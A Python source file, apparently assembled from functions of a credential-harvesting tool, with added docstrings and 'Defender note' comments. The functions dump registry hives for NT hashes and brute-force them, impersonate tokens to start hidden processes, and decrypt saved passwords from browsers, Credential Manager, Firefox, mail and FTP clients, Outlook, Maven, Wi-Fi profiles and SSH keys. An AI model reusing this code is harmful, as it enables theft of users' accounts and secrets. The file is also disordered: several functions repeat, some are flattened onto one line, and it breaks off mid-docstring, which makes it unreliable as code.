def hashes_to_dic(self, title, format, content):
    """Turn a mapping of dumped account hashes into a list of result dicts.

    Each value of *content* is a colon-separated record whose first four
    fields are unpacked as (uid, rid, lmhash, nthash). Every NT hash is
    handed to ``self.bruteForce_Hash``; accounts for which it returns a
    truthy password are reported individually. The final list element is
    always a dict holding all raw records under the key ``'hashes'``.

    :param title: Heading text passed to ``Header().title1``.
    :param format: Hash format label, only logged.
    :param content: Mapping of key -> "uid:rid:lmhash:nthash[:...]" string.
    :return: List of dicts (recovered accounts first, raw hashes last).
    """
    Header().title1(title)
    print_debug('INFO', 'Format: (%s)' % format)

    # Iterate in sorted key order so the output is deterministic.
    items = sorted(content)
    pwdFound = []
    values = {}
    all_hash = '\r\n'
    for item in items:
        hash = content[item]
        # Only the first four fields are used; rid and lmhash are unpacked but unused here.
        (uid, rid, lmhash, nthash) = hash.split(':')[:4]
        # The account name itself is added to the candidate list
        # (presumably consumed by bruteForce_Hash -- confirm).
        self.wordlist.append(uid.encode("utf8"))
        all_hash = '%s\r\n%s' % (all_hash, hash)
        password = self.bruteForce_Hash(nthash)
        # A hit means the account's password is present in the word list,
        # i.e. it is weak enough to be guessed offline.
        if password:
            accounts = {}
            accounts['Category'] = 'System account'
            accounts['user'] = uid
            accounts['password'] = password
            pwdFound.append(accounts)

    # The raw hash dump is appended as the last element.
    values['hashes'] = all_hash
    pwdFound.append(values)
    return pwdFound
def run(self):
    """Report Credential Manager entries of type CRED_TYPE_DOMAIN_VISIBLE_PASSWORD.

    Entries come from ``self.get_creds()``; each matching blob is passed to
    ``self.Win32CryptUnprotectData`` together with ``self.get_entropy()``.
    Results are handed to ``print_output``; nothing is returned.
    """
    # print title
    Header().title_info('Dot Net Passport')

    a = self.get_creds()
    pwd = ''
    pwdFound = []
    if a:
        for i in a:
            values = {}
            if i['Type'] == win32cred.CRED_TYPE_DOMAIN_VISIBLE_PASSWORD:
                cipher_text = i['CredentialBlob']
                pwd = self.Win32CryptUnprotectData(cipher_text, self.get_entropy())
                # The helper signals failure with the literal string 'failed'.
                if pwd != 'failed':
                    values['TargetName'] = i['TargetName']
                    if i['UserName'] is not None:
                        values['Username'] = i['UserName']
                    try:
                        values['Password'] = pwd.decode('utf16')
                    except Exception,e:
                        # Keep the entry, but record that the blob was not valid UTF-16.
                        print_debug('DEBUG', '{0}'.format(e))
                        values['INFO'] = 'Error decoding the password'
                    pwdFound.append(values)

    # print the results
    print_output('Dot Net Passport', pwdFound)
def get_creds(self):
    """Enumerate the current user's Credential Manager entries.

    :return: Whatever ``win32cred.CredEnumerate(None, 0)`` returns, or
             ``None`` when the call raises (the error is logged at DEBUG).
    """
    try:
        return win32cred.CredEnumerate(None, 0)
    except Exception as err:
        print_debug('DEBUG', '{0}'.format(err))
    return None
def impersonate_token(hToken):
    """Duplicate *hToken* as a primary token and impersonate it on this thread.

    :param hToken: Handle to an existing access token; it is closed here.
    :return: The duplicated token handle, or ``None`` if
             ``ImpersonateLoggedOnUser`` fails.

    Defender note: the sequence visible here (SeDebugPrivilege enabled,
    DuplicateTokenEx, ImpersonateLoggedOnUser) is access-token manipulation;
    privilege-use auditing and EDR token telemetry are the usual places to
    look for it.
    """
    # NOTE(review): a non-admin caller is only warned; execution continues.
    if not windll.Shell32.IsUserAnAdmin():
        print_debug('ERROR', 'You need admin rights to run impersonate !')
    EnablePrivilege("SeDebugPrivilege")
    hTokendupe = HANDLE( INVALID_HANDLE_VALUE )
    SecurityImpersonation = 2
    TokenPrimary = 1
    if not windll.advapi32.DuplicateTokenEx( hToken, TOKEN_ALL_ACCESS, None, SecurityImpersonation, TokenPrimary, byref( hTokendupe ) ):
        # NOTE(review): the WinError() object is created but never raised,
        # so a failed duplication is not surfaced to the caller.
        WinError()
    # The source token handle is closed whether or not duplication worked.
    windll.kernel32.CloseHandle(hToken)

    # Each privilege adjustment is best-effort: failures are swallowed.
    try:
        EnablePrivilege("SeAssignPrimaryTokenPrivilege", hToken = hTokendupe)
    except Exception as e:
        pass
    try:
        EnablePrivilege("SeIncreaseQuotaPrivilege", hToken = hTokendupe)
    except Exception as e:
        pass
    try:
        EnablePrivilege("SeImpersonatePrivilege")
    except Exception as e:
        pass

    # NOTE(review): on failure the duplicated handle is not closed before returning None.
    if not windll.advapi32.ImpersonateLoggedOnUser(hTokendupe):
        return
    return hTokendupe
def start_proc_with_token(args, hTokendupe, hidden=True):
    """Start a process under the security context of *hTokendupe*.

    :param args: Sequence of strings, joined with single spaces to form the
                 command line (no quoting is applied).
    :param hTokendupe: Token handle passed to CreateEnvironmentBlock and
                       CreateProcessAsUserA.
    :param hidden: When true, the STARTUPINFO asks for a hidden window.
    :return: PID of the new process, or ``None`` if either API call fails.

    Defender note: a child process whose token user differs from its
    parent's, created through CreateProcessAsUser, is visible in
    process-creation auditing.
    """
    lpProcessInformation = PROCESS_INFORMATION()
    lpStartupInfo = STARTUPINFO()
    if hidden:
        # NOTE(review): CREATE_NEW_PROCESS_GROUP is a process-creation flag,
        # not a STARTUPINFO flag; OR-ing it into dwFlags looks unintended -- confirm.
        lpStartupInfo.dwFlags = subprocess.STARTF_USESHOWWINDOW|subprocess.CREATE_NEW_PROCESS_GROUP
        lpStartupInfo.wShowWindow = subprocess.SW_HIDE

    CREATE_NEW_CONSOLE = 0x00000010
    CREATE_UNICODE_ENVIRONMENT = 0x00000400
    NORMAL_PRIORITY_CLASS = 0x00000020

    dwCreationflag = NORMAL_PRIORITY_CLASS | CREATE_UNICODE_ENVIRONMENT | CREATE_NEW_CONSOLE

    userenv = WinDLL('userenv', use_last_error=True)
    userenv.CreateEnvironmentBlock.argtypes = (POINTER(c_void_p), c_void_p, c_int)
    userenv.DestroyEnvironmentBlock.argtypes = (c_void_p,)
    cenv = c_void_p()

    # Build the environment block for the token's user (third argument 0: do not inherit).
    success = userenv.CreateEnvironmentBlock(byref(cenv), hTokendupe, 0)
    if not success:
        return

    # NOTE(review): DestroyEnvironmentBlock is declared above but never called in
    # this function, and the handles in lpProcessInformation are not closed.
    success = windll.advapi32.CreateProcessAsUserA(hTokendupe, None, ' '.join(args), None, None, True, dwCreationflag, cenv, None, byref(lpStartupInfo), byref(lpProcessInformation))
    if not success:
        return

    print_debug('INFO', 'Process created PID: ' + str(lpProcessInformation.dwProcessId))
    return lpProcessInformation.dwProcessId
def run(self):
    """Save the registry hives named in ``self.sysFile`` and pass them to ``retrieve_hash``.

    Requires an administrative context; otherwise a warning is logged and the
    method returns. Hive copies are written as ``<name>.save`` relative to the
    current working directory and deleted again at the end.

    Defender note: ``reg.exe save hklm\\<hive>`` command lines and ``.save``
    hive copies on disk are the observable artefacts of this routine.
    """
    # Need admin privileges
    if not windll.Shell32.IsUserAnAdmin():
        # The title is only printed when INFO logging is enabled.
        if logging.getLogger().isEnabledFor(logging.INFO) == True:
            Header().title('Windows Secrets')
        print_debug('WARNING', '[!] This script should be run as admin!')
        return

    # print the title
    Header().title('Windows Secrets')

    # Remove leftovers from a previous run so reg.exe does not prompt/fail on overwrite.
    if self.check_existing_systemFiles():
        self.delete_existing_systemFiles()

    # save system hives
    # NOTE(review): the command is a formatted string run with shell=True; the
    # names come from self.sysFile, so this is only safe while that stays constant.
    for f in self.sysFile:
        subprocess.Popen('reg.exe save hklm\%s %s.save' % (f,f) , shell=True, stdout=subprocess.PIPE).stdout.read()

    if not self.check_existing_systemFiles():
        print_debug('WARNING', 'Remove existing hive files and launch it again.')
        return

    retrieve_hash(self.address, '%s.save' % self.sysFile[2], '%s.save' % self.sysFile[1], '%s.save' % self.sysFile[0], self.ntds, self.history)

    # remove hives files
    # NOTE(review): not in a finally block -- if retrieve_hash raises, the hive
    # copies stay on disk.
    self.delete_existing_systemFiles()
def ListSids():
    """List (pid, process name, token SID, username) for running processes.

    Processes with pid <= 4 or without a resolvable username are skipped.

    :return: List of 4-tuples, one per process whose token SID could be read.
    """
    sids=[]
    for proc in psutil.process_iter():
        try:
            pinfo = proc.as_dict(attrs=['pid', 'username', 'name'])
        except psutil.NoSuchProcess:
            # NOTE(review): after this 'pass' the code below still reads pinfo,
            # which is either unbound (first iteration) or left over from the
            # previous process; a 'continue' looks intended.
            pass
        if pinfo['pid']<=4:
            continue
        if pinfo['username'] is None:
            continue
        try:
            hProcess = windll.kernel32.OpenProcess(PROCESS_QUERY_INFORMATION, False, int(pinfo['pid']))
            hToken = HANDLE(INVALID_HANDLE_VALUE)
            # Return values of OpenProcess/OpenProcessToken are not checked.
            windll.advapi32.OpenProcessToken(hProcess, tokenprivs, byref(hToken))
            try:
                sids.append((pinfo['pid'], pinfo['name'], GetTokenSid(hToken), pinfo['username']))
            except:
                # Bare except: any failure in GetTokenSid silently drops the process.
                pass
            windll.kernel32.CloseHandle(hToken)
            windll.kernel32.CloseHandle(hProcess)
        except Exception as e:
            print_debug('ERROR', str(e))
    return list(sids)
def get_history(self):
    """Collect candidate URLs from the registry and from a helper DLL.

    URLs from ``self.history_from_regedit()`` are extended with the strings
    returned by the ``list`` export of the library at ``dll_name``; four
    fixed login URLs are always appended at the end.

    :return: List of URL strings.
    """
    urls = []
    urls = self.history_from_regedit()
    try:
        # wrapper to call the dll exported function (called list)
        lib = cdll.LoadLibrary(dll_name)
        lib.list.restype = POINTER(c_wchar_p)
        ret = lib.list()
        # The returned array is walked until the first falsy entry.
        for r in ret:
            if r:
                if r.startswith("http") and r not in urls:
                    urls.append(r)
            else:
                break
        # Unload the dll to delete it later
        handle = lib._handle # obtain the DLL handle
        windll.kernel32.FreeLibrary(handle)

        # delete the dll
        os.remove(dll_name)
    except:
        # NOTE(review): bare except -- a failure anywhere above (load, call,
        # unload, delete) ends up here, and the DLL may be left on disk.
        print_debug('ERROR', 'Browser history failed to load, only few url will be tried')
        pass

    urls.append('https://www.facebook.com/')
    urls.append('https://www.gmail.com/')
    urls.append('https://accounts.google.com/')
    urls.append('https://accounts.google.com/servicelogin')
    return urls
def accountrc_decrypt(self, filename, key, mode=DES.MODE_CFB):
    """Read the stored passwords from a ClawsMail ``accountrc`` file.

    :param filename: Path of the INI-style accountrc file.
    :param key: Key forwarded to ``self.pass_decrypt``.
    :param mode: DES mode forwarded to ``self.pass_decrypt`` (default CFB).
    :return: List of dicts with the keys 'Account', 'Address' and 'Password',
             one per section that could be processed.
    """
    p = ConfigParser()
    p.read(filename)

    pwdFound = []
    for s in p.sections():
        values = {}
        try:
            try:
                address = p.get(s, 'address')
                account = p.get(s, 'account_name')
            except:
                # If either option is missing, both fall back to a placeholder.
                address = '<unknown>'
                account = '<unknown>'

            password = self.pass_decrypt(p.get(s, 'password'), key, mode=mode)
            values = {'Account' : account, 'Address': address, 'Password': password}
        except Exception as e:
            # A section without a password (or a decryption error) is logged and skipped.
            print_debug('ERROR', 'Error resolving password for account "%s": %s' % (s, e))

        # Only sections that produced a result are reported.
        if len(values) != 0:
            pwdFound.append(values)
    return pwdFound
def extractSecretKey(self, globalSalt, masterPassword, entrySalt):
    """Decode and decrypt the private-key entry held in ``self.key3``.

    NOTE(review): the *globalSalt* and *entrySalt* arguments are overwritten
    on the first line by the result of ``is_masterpassword_correct``, so only
    *masterPassword* is actually taken from the caller.

    :return: The key as a byte string, or ``None`` when the fixed key-3
             entry id is not present in ``self.key3``.
    """
    (globalSalt, masterPassword, entrySalt) = self.is_masterpassword_correct(masterPassword)

    if unhexlify('f8000000000000000000000000000001') not in self.key3:
        return None
    privKeyEntry = self.key3[ unhexlify('f8000000000000000000000000000001') ]
    # Bytes 1 and 2 give the salt and name lengths; the ASN.1 payload
    # starts after the 3-byte header plus those two fields.
    saltLen = ord( privKeyEntry[1] )
    nameLen = ord( privKeyEntry[2] )
    privKeyEntryASN1 = decoder.decode( privKeyEntry[3+saltLen+nameLen:] )
    data = privKeyEntry[3+saltLen+nameLen:]
    self.printASN1(data, len(data), 0)

    #see https://github.com/philsmd/pswRecovery4Moz/blob/master/pswRecovery4Moz.txt
    entrySalt = privKeyEntryASN1[0][0][1][0].asOctets()
    privKeyData = privKeyEntryASN1[0][1].asOctets()
    privKey = self.decrypt3DES( globalSalt, masterPassword, entrySalt, privKeyData )
    self.printASN1(privKey, len(privKey), 0)

    # The decrypted blob is itself ASN.1 and wraps a further ASN.1 structure.
    privKeyASN1 = decoder.decode( privKey )
    prKey= privKeyASN1[0][2].asOctets()
    self.printASN1(prKey, len(prKey), 0)
    prKeyASN1 = decoder.decode( prKey )
    # NOTE(review): 'id' is assigned but never used, and shadows the builtin.
    id = prKeyASN1[0][1]
    key = long_to_bytes( prKeyASN1[0][3] )

    # NOTE(review): the key material is written to the DEBUG log.
    print_debug('DEBUG', 'key: %s' % repr(key))
    return key
def run(self):
    """Entry point of the SQL Developer module.

    ``get_mainPath`` and ``get_passphrase`` report problems through sentinel
    strings; each sentinel is logged and ends the run. Otherwise the salt is
    fetched and ``get_infos`` is called with path, passphrase and salt.
    """
    Header().title_debug('SQL Developer')

    mainPath = self.get_mainPath()
    if mainPath == 'Error':
        print_debug('ERROR', 'The APPDATA environment variable is not defined.')
        return
    if mainPath == 'SQL_NOT_EXISTS':
        print_debug('INFO','SQL Developer not installed.')
        return
    if mainPath == 'SQL_NO_PASSWD':
        print_debug('INFO', 'No passwords found.')
        return

    passphrase = self.get_passphrase(mainPath)
    if passphrase == 'Not_Found':
        print_debug('WARNING', 'The passphrase used to encrypt has not been found.')
        return
    if passphrase == 'xml_Not_Found':
        print_debug('WARNING', 'The xml file containing the passphrase has not been found.')
        return

    salt = self.get_salt()
    self.get_infos(mainPath, passphrase, salt)
def decipher_new_version(self, path):
    """Read saved logins from the ``Login Data`` SQLite file under *path*.

    Each ``password_value`` is passed to ``win32crypt.CryptUnprotectData``
    (DPAPI), so it only yields plaintext in the context of the user who
    stored it. Results go to ``print_output``; nothing is returned. If the
    file does not exist the method does nothing.

    Defender note: a process other than the browser opening ``Login Data``
    is the observable event here.
    """
    database_path = path + os.sep + 'Login Data'
    if os.path.exists(database_path):

        # Connect to the Database
        # NOTE(review): the connection is never closed in this function.
        conn = sqlite3.connect(database_path)
        cursor = conn.cursor()

        # Get the results
        try:
            cursor.execute('SELECT action_url, username_value, password_value FROM logins')
        except Exception,e:
            # Any query failure is reported as a locked database.
            print_debug('DEBUG', '{0}'.format(e))
            print_debug('ERROR', 'Opera seems to be used, the database is locked. Kill the process and try again !')
            return

        pwdFound = []
        for result in cursor.fetchall():
            values = {}

            # Decrypt the Password; element [1] of the result is the plaintext.
            password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
            if password:
                values['Site'] = result[0]
                values['Username'] = result[1]
                values['Password'] = password
                pwdFound.append(values)

        # print the results
        print_output("Opera", pwdFound)
def retrieve_password(self):
    """Report the wireless settings stored by NetworkManager.

    Every regular file in ``/etc/NetworkManager/system-connections`` is parsed
    as an INI file; all options of sections whose name contains 'wireless'
    are copied into the result, together with the file name as 'SSID'.
    Results go to ``print_output``; nothing is returned.

    Defender note: these files are normally readable by root only, which is
    why the method warns when not running as uid 0.
    """
    # print the title
    Header().title_debug('Wifi (from Network Manager)')

    directory = '/etc/NetworkManager/system-connections'
    if os.path.exists(directory):
        # Only a notice: execution continues without root.
        if os.getuid() != 0:
            print_debug('INFO', 'You need more privileges (run it with sudo)\n')

        wireless_ssid = [ f for f in os.listdir(directory) if os.path.isfile(os.path.join(directory,f))]

        pwdFound = []
        for w in wireless_ssid:
            cp = RawConfigParser()
            # read() silently ignores files it cannot open.
            cp.read(os.path.join(directory, w))
            values = {}

            values['SSID'] = w
            if cp.sections():
                for section in cp.sections():
                    if 'wireless' in section:
                        for i in cp.items(section):
                            values[i[0]] = i[1]

            # 'SSID' is always set, so every file produces an entry.
            if len(values) != 0:
                pwdFound.append(values)

        # print the results
        print_output('Wifi', pwdFound)
    else:
        print_debug('ERROR', 'the path "%s" does not exist' %(directory))
def run(self):
    """Entry point of the SQL Developer module.

    Sentinel strings returned by ``get_mainPath`` / ``get_passphrase`` are
    mapped to a log message and stop the run; on success ``get_infos`` is
    called with the path, the passphrase and the salt.
    """
    Header().title_debug('SQL Developer')

    mainPath = self.get_mainPath()
    path_sentinels = (
        ('Error', 'ERROR', 'The APPDATA environment variable is not defined.'),
        ('SQL_NOT_EXISTS', 'INFO', 'SQL Developer not installed.'),
        ('SQL_NO_PASSWD', 'INFO', 'No passwords found.'),
    )
    for sentinel, level, message in path_sentinels:
        if mainPath == sentinel:
            print_debug(level, message)
            return

    passphrase = self.get_passphrase(mainPath)
    passphrase_sentinels = (
        ('Not_Found', 'The passphrase used to encrypt has not been found.'),
        ('xml_Not_Found', 'The xml file containing the passphrase has not been found.'),
    )
    for sentinel, message in passphrase_sentinels:
        if passphrase == sentinel:
            print_debug('WARNING', message)
            return

    salt = self.get_salt()
    self.get_infos(mainPath, passphrase, salt)
def get_history(self): urls = [] urls = self.history_from_regedit() try: # wrapper to call the dll exported function (called list) lib = cdll.LoadLibrary(dll_name) lib.list.restype = POINTER(c_wchar_p) ret = lib.list() for r in ret: try: if r: if r.startswith("http") and r not in urls: urls.append(r) else: break except Exception, e: print_debug('DEBUG', '{0}'.format(e)) # Unload the dll to delete it later handle = lib._handle # obtain the DLL handle windll.kernel32.FreeLibrary(handle) # delete the dll os.remove(dll_name)
def extractSecretKey(self, globalSalt, masterPassword, entrySalt):
    """Decode and decrypt the private-key entry held in ``self.key3``.

    NOTE(review): *globalSalt* and *entrySalt* are replaced immediately by
    the values returned from ``is_masterpassword_correct``; only
    *masterPassword* is really an input.

    :return: The key as a byte string, or ``None`` when the fixed entry id
             is missing from ``self.key3``.
    """
    (globalSalt, masterPassword, entrySalt) = self.is_masterpassword_correct(masterPassword)

    if unhexlify('f8000000000000000000000000000001') not in self.key3:
        return None
    privKeyEntry = self.key3[unhexlify('f8000000000000000000000000000001')]
    # Header layout: byte 1 = salt length, byte 2 = name length; the ASN.1
    # payload follows those two variable-length fields.
    saltLen = ord(privKeyEntry[1])
    nameLen = ord(privKeyEntry[2])
    privKeyEntryASN1 = decoder.decode(privKeyEntry[3 + saltLen + nameLen:])
    data = privKeyEntry[3 + saltLen + nameLen:]
    self.printASN1(data, len(data), 0)

    #see https://github.com/philsmd/pswRecovery4Moz/blob/master/pswRecovery4Moz.txt
    entrySalt = privKeyEntryASN1[0][0][1][0].asOctets()
    privKeyData = privKeyEntryASN1[0][1].asOctets()
    privKey = self.decrypt3DES(globalSalt, masterPassword, entrySalt, privKeyData)
    self.printASN1(privKey, len(privKey), 0)

    # Two further ASN.1 layers are unwrapped before the key integer is reached.
    privKeyASN1 = decoder.decode(privKey)
    prKey = privKeyASN1[0][2].asOctets()
    self.printASN1(prKey, len(prKey), 0)
    prKeyASN1 = decoder.decode(prKey)
    # NOTE(review): unused local that shadows the builtin 'id'.
    id = prKeyASN1[0][1]
    key = long_to_bytes(prKeyASN1[0][3])

    # NOTE(review): key material ends up in the DEBUG log.
    print_debug('DEBUG', 'key: %s' % repr(key))
    return key
def get_key_info(self):
    """Open the CoreFTP ``Sites`` key under HKEY_CURRENT_USER for reading.

    Only the opening of the key is visible in this listing: on failure the
    error is logged at DEBUG level and ``False`` is returned.
    NOTE(review): nothing after the handler is shown, so what is done with
    ``key`` on success cannot be documented from here.
    """
    accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    try:
        key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\\FTPware\\CoreFTP\\Sites', 0, accessRead)
    except Exception,e:
        # A missing key is the expected case when the client is not installed.
        print_debug('DEBUG', '{0}'.format(e))
        return False
def get_logins_info(self):
    """Open the WinSCP ``Sessions`` key under HKEY_CURRENT_USER for reading.

    Only the opening of the key is visible in this listing: on failure the
    error is logged at DEBUG level and ``False`` is returned.
    NOTE(review): the path literal relies on ``\\M``, ``\\W`` and ``\\S`` not
    being escape sequences; a raw string or doubled backslashes would be safer.
    """
    accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    try:
        key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Sessions', 0, accessRead)
    except Exception,e:
        # A missing key is the expected case when WinSCP has no stored sessions.
        print_debug('DEBUG', '{0}'.format(e))
        return False
def get_history(self): urls = [] urls = self.history_from_regedit() try: # wrapper to call the dll exported function (called list) lib = cdll.LoadLibrary(dll_name) lib.list.restype = POINTER(c_wchar_p) ret = lib.list() for r in ret: try: if r: if r.startswith("http") and r not in urls: urls.append(r) else: break except Exception,e: print_debug('DEBUG', '{0}'.format(e)) # Unload the dll to delete it later handle = lib._handle # obtain the DLL handle windll.kernel32.FreeLibrary(handle) # delete the dll os.remove(dll_name)
def retrieve_password(self):
    """Report the wireless settings stored by NetworkManager.

    Each regular file in ``/etc/NetworkManager/system-connections`` is parsed
    as an INI file. Options from every section whose name contains 'wireless'
    are copied into one dict per file, with the file name stored as 'SSID'.
    Results go to ``print_output``; nothing is returned.
    """
    # print the title
    Header().title_debug('Wifi (from Network Manager)')

    directory = '/etc/NetworkManager/system-connections'
    if os.path.exists(directory):
        # Informational only -- the scan is still attempted without root.
        if os.getuid() != 0:
            print_debug('INFO', 'You need more privileges (run it with sudo)\n')

        wireless_ssid = [ f for f in os.listdir(directory) if os.path.isfile(os.path.join(directory,f))]

        pwdFound = []
        for w in wireless_ssid:
            cp = RawConfigParser()
            # Unreadable files are skipped silently by read().
            cp.read(os.path.join(directory, w))
            values = {}

            values['SSID'] = w
            if cp.sections():
                for section in cp.sections():
                    if 'wireless' in section:
                        for i in cp.items(section):
                            values[i[0]] = i[1]

            # Always true here because 'SSID' was set above.
            if len(values) != 0:
                pwdFound.append(values)

        # print the results
        print_output('Wifi', pwdFound)
    else:
        print_debug('WARNING', 'the path "%s" does not exist' %(directory))
def run(self):
    """Read the login stored in the Kalypso Media Launcher ``launcher.ini``.

    The 'password' option of the 'styx user' section is base64-decoded and
    passed to ``self.xorstring`` with a key that is hard-coded below.

    Defender note: because the key is a constant in the code, the stored
    value is obfuscated rather than encrypted; anyone who can read the INI
    file can recover it.
    """
    # print title
    Header().title_info('Kalypso Media Launcher')
    creds = []
    key = 'lwSDFSG34WE8znDSmvtwGSDF438nvtzVnt4IUv89'

    if 'APPDATA' in os.environ:
        inifile = os.environ['APPDATA'] + '\\Kalypso Media\\Launcher\\launcher.ini'
    else:
        print_debug('ERROR', 'The APPDATA environment variable is not defined.')
        return

    # The actual user details are stored in *.userdata files
    if not os.path.exists(inifile):
        print_debug('INFO', 'The Kalypso Media Launcher doesn\'t appear to be installed.')
        return

    config = ConfigParser.ConfigParser()
    config.read(inifile)
    values = {}

    # NOTE(review): a missing section or option raises here; nothing catches it.
    values['Login'] = config.get('styx user','login')

    # get the encoded password
    cookedpw = base64.b64decode(config.get('styx user','password'));
    values['Password'] = self.xorstring(cookedpw, key)

    creds.append(values)

    print_output("Kalypso Media Launcher", creds)
class Chrome(ModuleInfo):
    """Module that locates and opens Chrome's ``Login Data`` SQLite database.

    Only the part of ``run`` up to opening the database is visible in this
    listing.
    """

    def __init__(self):
        # Command-line switch (-c) that enables this module.
        options = {
            'command': '-c',
            'action': 'store_true',
            'dest': 'chrome',
            'help': 'chrome'
        }
        ModuleInfo.__init__(self, 'chrome', 'browsers', options)

    # main function
    def run(self):
        """Locate ``Login Data``, copy it to ``tmp_db`` in the cwd and open the copy.

        Defender note: a copy of ``Login Data`` appearing outside the browser
        profile (here ``tmp_db`` in the working directory) is an observable
        artefact of this routine.
        """
        # print title
        Header().title_info('Chrome')

        database_path = ''
        if 'HOMEDRIVE' in os.environ and 'HOMEPATH' in os.environ:
            # NOTE(review): the two variable names look swapped relative to the
            # paths they hold ('Local Settings\Application Data' is the XP
            # layout, 'AppData\Local' the Vista-and-later one). Both are
            # checked, so the outcome is unaffected.
            # For Win7
            path_Win7 = os.environ.get('HOMEDRIVE') + os.environ.get(
                'HOMEPATH'
            ) + '\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data'

            # For XP
            path_XP = os.environ.get('HOMEDRIVE') + os.environ.get(
                'HOMEPATH'
            ) + '\AppData\Local\Google\Chrome\User Data\Default\Login Data'

            if os.path.exists(path_XP):
                database_path = path_XP
            elif os.path.exists(path_Win7):
                database_path = path_Win7
            else:
                print_debug('INFO', 'Google Chrome not installed.')
                return
        else:
            print_debug(
                'ERROR',
                'Environment variables (HOMEDRIVE or HOMEPATH) have not been found'
            )
            return

        # Copy database before to query it (bypass lock errors)
        try:
            shutil.copy(database_path, os.getcwd() + os.sep + 'tmp_db')
            database_path = os.getcwd() + os.sep + 'tmp_db'
        except Exception, e:
            # On failure the original (possibly locked) file is used instead.
            print_debug('DEBUG', '{0}'.format(e))
            print_debug('ERROR', 'An error occured copying the database file')

        # Connect to the Database
        try:
            conn = sqlite3.connect(database_path)
            cursor = conn.cursor()
        except Exception, e:
            print_debug('DEBUG', '{0}'.format(e))
            print_debug('ERROR', 'An error occured opening the database file')
            return
def retrieve_password(self):
    """Walk the Outlook messaging profile in the registry for password values.

    The profile key under HKEY_CURRENT_USER is enumerated two levels deep;
    for every value whose name contains 'password' (case-insensitive),
    ``self.retrieve_info`` is called on the owning sub-key. Results go to
    ``print_output``; nothing is returned.
    """
    # print title
    Header().title_debug('Outlook')

    accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook'

    try:
        hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead)
    except:
        # NOTE(review): bare except -- any error is reported as "not installed".
        print_debug('WARNING', 'Outlook not installed.\nAn error occurs retrieving the registry key.\nKey = %s' % keyPath)
        return

    # Index [0] of RegQueryInfoKey is the number of sub-keys.
    num = win32api.RegQueryInfoKey(hkey)[0]
    pwdFound = []
    for x in range(0, num):
        name = win32api.RegEnumKey(hkey, x)
        skey = win32api.RegOpenKey(hkey, name, 0, accessRead)

        num_skey = win32api.RegQueryInfoKey(skey)[0]
        if num_skey != 0:
            for y in range(0, num_skey):
                name_skey = win32api.RegEnumKey(skey, y)
                sskey = win32api.RegOpenKey(skey, name_skey, 0, accessRead)
                # Index [1] is the number of values in the key.
                num_sskey = win32api.RegQueryInfoKey(sskey)[1]
                for z in range(0, num_sskey):
                    k = win32api.RegEnumValue(sskey, z)
                    if 'password' in k[0].lower():
                        # NOTE(review): called once per matching value, so a
                        # sub-key with several password values is reported
                        # several times.
                        values = self.retrieve_info(sskey, name_skey)
                        if len(values) != 0:
                            pwdFound.append(values)

    # print the results
    print_output("Outlook", pwdFound)
def extract_repositories_credentials(self):
    """
    Extract the credentials of every <server> entry in the user's Maven settings.

    The file read is ``%USERPROFILE%\\.m2\\settings.xml``. For each <server>
    node, child elements whose tag (namespace stripped) is listed in
    ``self.nodes_to_extract`` are copied into a dict.
    See https://maven.apache.org/settings.html#Servers

    Defender note: plaintext <password> values in settings.xml are readable
    by anything running as the user; Maven's password encryption exists for
    that reason.

    :return: List of dict in which one dict contains all information for a repository.
    """
    repos_creds = []
    # NOTE(review): if USERPROFILE is unset, os.environ.get returns None and
    # the concatenation raises TypeError outside the try block.
    maven_settings_file_location = os.environ.get("USERPROFILE") + "\\.m2\\settings.xml"
    if os.path.isfile(maven_settings_file_location):
        try:
            settings = ET.parse(maven_settings_file_location).getroot()
            server_nodes = settings.findall(".//%sserver" % self.settings_namespace)
            for server_node in server_nodes:
                creds = {}
                for child_node in server_node:
                    tag_name = child_node.tag.replace(self.settings_namespace, "")
                    if tag_name in self.nodes_to_extract:
                        # NOTE(review): an empty element has text None; .strip()
                        # then raises and the handler below abandons the
                        # remaining servers.
                        creds[tag_name] = child_node.text.strip()
                if len(creds) > 0:
                    repos_creds.append(creds)
        except Exception as e:
            print_debug("ERROR", "Cannot retrieve repositories credentials '%s'" % e)
            pass

    return repos_creds
def extract_private_keys_unprotected(self):
    """
    Extract all DSA/RSA private keys that are not protected with a passphrase.

    Every file below ``self.key_files_location`` is read in full; files
    containing a "DSA PRIVATE KEY" or "RSA PRIVATE KEY" marker are tested with
    ``self.is_private_key_unprotected``.

    Defender note: a key reported here can be used by anyone who can read the
    file; protecting it with a passphrase removes it from this result.

    :return: List of encoded key (key file content)
    """
    keys = []
    if isdir(self.key_files_location):
        # followlinks=True: symlinked directories are traversed too, so a link
        # loop or a link to a large tree makes the walk correspondingly long.
        for (dirpath, dirnames, filenames) in walk(self.key_files_location, followlinks=True):
            for f in filenames:
                key_file_path = join(dirpath, f)
                if isfile(key_file_path):
                    try:
                        # Read encoded content of the key
                        with open(key_file_path, "r") as key_file:
                            key_content_encoded = key_file.read()
                        # Determine the algorithm from the PEM marker; anything
                        # else (public keys, other formats) is ignored.
                        if "DSA PRIVATE KEY" in key_content_encoded:
                            key_algorithm = "DSA"
                        elif "RSA PRIVATE KEY" in key_content_encoded:
                            key_algorithm = "RSA"
                        else:
                            key_algorithm = None
                        # Check if the key can be loaded (used) without passphrase
                        if key_algorithm is not None and self.is_private_key_unprotected(key_content_encoded, key_algorithm):
                            keys.append(key_content_encoded)
                    except Exception as e:
                        # Unreadable files are logged and skipped.
                        print_debug("ERROR", "Cannot load key file '%s' '%s'" % (key_file_path, e))
                        pass

    return keys
def is_private_key_unprotected(self, key_content_encoded, key_algorithm):
    """
    Check if the private key can be loaded without specifying any passphrase.
    PyCrypto >= 2.6.1 required in order to have the method importKey() in DSA class.

    Any exception raised while importing (including the one raised for a
    passphrase-protected key) is logged and treated as "protected".

    :param key_content_encoded: Encoded content of the private key to test
